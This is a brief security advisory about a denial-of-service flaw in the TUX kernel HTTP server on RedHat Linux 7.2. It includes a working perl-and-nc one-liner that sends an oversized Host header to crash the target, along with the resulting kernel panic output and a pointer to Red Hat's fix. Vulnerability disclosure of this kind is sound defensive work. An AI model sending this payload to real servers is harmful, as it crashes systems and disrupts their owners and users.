COMMAND

	kernel httpd

SYSTEMS AFFECTED

	 RedHat Linux 7.2:

	 0) Kernel(s) 2.4.7-10 and 2.4.9-7

	 0) TUX-2.1.0-2.

	

	 (At least)

PROBLEM

	Aiden ORawe posted :
	

	Tux is a Kernel-Space HTTP server coded  for  optimal  performance  (IRQ
	Affinity,HTTP Compression, direct scatter-gather DMA etc.) and is  meant
	to be used as the main HTTP server for static objects with requests  for
	dynamic content being passed  to  a  user-space  HTTPD  server  such  as
	Apache on same box when necessary. The TUX web  server  is  disabled  by
	default.
	

	It is possible to cause a denial of service condition by  submitting  an
	oversized  \"Host:\"  header  request  to  the  Tux  daemon  causing  an
	assertion failure and eventual Kernel Panic. A total  system  reboot  is
	required to return the  box  to  full  functionality.  For  example  the
	following script:
	

	perl -e \"print qq(GET / HTTP/1.0\\nAccept:  */*\\nHost:  )  .  qq(A)  x
	6000 . qq(\\n)\" |nc <ip address> 80
	

	Will cause the affected box to crash with the below output  (edited  for
	brevity):
	

	

	Code: Bad EIP Value.
	 (0)Kernel Panic: Aiee, killing interrupt handler!

	In interrupt handler - not syncing!
	

	

	Despite being able to affect the  contents  of  the  EIP  register  this
	vulnerability cannot, to the best of my understanding,  be  utilised  to
	provide for a remote root compromise.

SOLUTION

	See Security Advisory - RHSA-2001:142-15
	 

	http://www.redhat.com/support/errata/RHSA-2001-142.html